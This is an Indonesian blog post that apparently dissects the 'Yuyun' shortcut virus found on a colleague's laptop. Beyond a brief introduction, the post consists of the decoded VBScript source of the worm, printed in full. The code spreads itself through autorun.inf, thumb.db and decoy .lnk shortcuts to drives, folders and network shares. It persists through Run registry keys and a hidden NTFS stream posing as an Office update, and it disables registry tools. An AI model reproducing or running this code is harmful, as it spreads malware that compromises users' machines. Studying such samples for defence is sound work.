Dalaman virus Sortcut

Barusan teman kantor laptopnya ada yang kena virus. Modelnya dia buat sortcut di setiap folder dengan nama Microsoft.lnk, New Folder.lnk dan [Nama Folder].lnk. Wah saya belum pernah nih dapet virus seperti ini. Trus saya coba cari di internet, ternyata namanya virus sortcut, atau kadang juga disebut virus Hery Potter. Virus ini menggunakan windows script untuk mengeksekuis dirinya sendiri. Untuk lebih detailnya coba intip di sini
Di blog ini saya lebih tertarik menunjukkan jeroannya virus ini. Saya coba buka file Thumb.db Trus di situ ada beberapa script yang bisa di eksekusi via vbscript. (Windows script). Tapi ada bagian yang di "enkripsi" xor. Setelah saya buka, ini dalamannya ^_^

======================================================= My name : Yuyun Ver 1.0 I just wanna see every girl looks nice, better, kinds especially a moslem girl by: Anonymouse in Jatim, November 2008 When I found nothing beauty else... and then I wrote this script for all=======================================================On' Error Resume NextDim' fso, ws, status,status1, flyset' fso = CreateObject("scripting.filesystemobject")set' ws = CreateObject("wscript.Shell")set' sh = CreateObject("Shell.application")set' net = CreateObject("wscript.network")fly=falsetmp=fso.GetSpecialFolder(2)tn=fso.GetTempNametmpt=tmp+"\"+tndocx=ws.SpecialFolders("MyDocuments")set' swt=WScript.ArgumentsIf' swt.Count>0 Then status=swt(0)End' IfIf' fso.fileexists(tmp+"\Yuyun.Q") then set ira=fso.getfile(tmp+"\Yuyun.Q") ira.attributes=0 ira.name="shalihah.ira" if ira.name="shalihah.ira" then ira.name="Yuyun.Q" set ira=fso.opentextfile(tmp+"\Yuyun.Q",2,true) else fly=true end ifelse set ira=fso.opentextfile(tmp+"\Yuyun.Q",2,true)End' ifset' AQ=fso.GetFile(status)If' fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0AQ.Copy tmpt,Trueset' AQ=fso.GetFile(tmpt)AQ.Attributes=39anv=tmp+"\auto.exe"If' Not fso.FileExists(anv) Then AQ.Copy anvset' auto=fso.GetFile(anv) auto.attributes=0set' aut=fso.OpenTextFile(anv,2,True,0)isi="[autorun]>open=WScript.exe //e:VBScript thumb.db auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript thumb.db auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript thumb.db auto"isi=Replace(isi,">",vbCrLf)aut.Write isiaut.Closeauto.Attributes=39ltkc=sh.Namespace(&H1c&).Self.path + "\Microsoft\CD Burning"AQ.Copy ltkc+"\thumb.db",Trueauto.Copy ltkc+"\autorun.inf",TrueIf' fso.FileExists(docx+"\database.mdb") Then fso.GetFile(docx+"\database.mdb").Attributes=0AQ.Copy docx+"\database.mdb",TrueregQset' rara=UNISKAHertz FalseIf' Day(Now)<>3 Then rekursif docx,1 Else rekursif docx,3call' attack_netHertz TrueSub' rekursif(path,dp)On' Error Resume Nextdropf' pathwscript.sleep 50If' dp>0 ThenFor' Each fldr1 In fso.GetFolder(path+"\").SubFolders rekursif fldr1.Path, dp-1NextEnd' IfEnd' SubSub' dropf(path)On' Error Resume NextIf' day(now)=1 and (month(now)mod 3)=1 then rara.copy path+"\Baca AQ.rtf"rara.copy path+"\My name is Yuyun.rtf"End' ifg1=path+"\autorun.inf"g2=path+"\Thumb.db"If' fso.FileExists(g1) Then Set g11=fso.GetFile(g1) If g11.Attributes<>39 Then g11.Attributes=0 auto.Copy path+"\autorun.inf",True end ifelse' auto.Copy path+"\autorun.inf",TrueEnd' ifIf' fso.FileExists(g2) Then Set g12=fso.GetFile(g2) If g12.Attributes<>39 Then g12.Attributes=0 AQ.Copy path+"\Thumb.db",True end ifelse AQ.Copy path+"\Thumb.db",TrueEnd' IfIf' Not fso.FileExists(path+"\Microsoft.lnk") ThenshorZvnita path+"\Microsoft","Microsoft"drop=Array("New Harry Potter and...","New Folder","SuratQ","Rahasia","Game","Zvnita","Download","DataQ","DataQ")ww=1For' Each d In drop If Day(now) Mod 3 = ww Then shorZvnita path+"\"+d,d wscript.sleep 60 ww=ww+1Nextr=0For' Each fldr In fso.GetFolder(path+"\").SubFolders shorZvnita path+"\"+fldr.name,fldr.Name wscript.sleep 60If' r>3 Then Exit ForEnd' ifr='r'+'1NextEnd' IfEnd' SubSub' shorZvnita(path,trgt)set' shor=ws.CreateShortcut(path+".lnk")shor.iconlocation="shell32.dll,3"shor.targetpath="wscript.exe"shor.arguments="//e:VBScript thumb.db """+trgt+""""shor.saveEnd' Subfunction' attack_net() On Error Resume Next err.clear Set objFolder = sh.Namespace(&H13&) Set colItems = objFolder.Items For Each strFileName in objFolder.Items t= objFolder.GetDetailsOf(strFileName, 14) if fso.folderexists(t) then rekursif t,4 end if NextEnd' functionSub' tdr()On' Error Resume Nexterr.clearWScript.Sleep 180000If' err.number>0 then wscript.quitEnd' Subfunction' UNISKA()On' error resume nextx=vbcrlfadv="Yuyun Ver 1.0 ^_^!==================>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>""Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman."">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: ""Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat."" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: ""Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya...."" (QS. An Nur:30)>>Sorry I just Nitip Print thok....Ndak pa2 khan^_^! www.muslimah.or.id >>Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu >pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.>Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah >sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-A'raf:26)"adv=replace(adv,">",x)set' Yu2n=fso.opentextfile(tmp+"\v.doc",2,true)Yu2n.write advYu2n.closeIf' day(now)=1 and (month(now)mod 3)=1 then If' fly=false thenFor' i=1 to 3ws.run "notepad.exe /p """+tmp+"\v.doc"""nextEnd' ifEnd' ifset' UNISKA=fso.getfile(tmp+"\v.doc")End' functionSub' regQ()On' Error Resume NextIf' day(now)=1 thenws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\", "Yuyun_Cantix"ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\","shell32.dll,48"ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes",0,"REG_DWORD"ws.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\",""End' ifws.regdelete "HKCR\lnkfile\IsShortcut"ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Explorer","Wscript.exe //e:VBScript """+docx+"\database.mdb"""ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools",1,"REG_DWORD"If' lcase(fso.getdrive("c:").FileSystem)="ntfs" theniraQ=AQ.openastextstream(1,0).read(AQ.size)www=fso.GetSpecialFolder(0)set' jjk=fso.opentextfile(www+"\:Microsoft Office Update for Windows XP.sys",2,true)jjk.write iraQjjk.closews.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate","Wscript.exe //e:VBScript """+www+"\:Microsoft Office Update for Windows XP.sys"""End' ifEnd' SubSub' Hertz(ooo)On' Error Resume NextdoFor' Each drv In fso.DrivesIf' drv.DriveType=1 Thenrekursif' drv.Path,4elserekursif' drv.Path,2End' ifNextIf' fly=false then tdrelse' wscript.quitEnd' ifregQIf' ooo=False Then Exit DoEnd' IfloopEnd' Sub

Moga-moga bermanfaat :)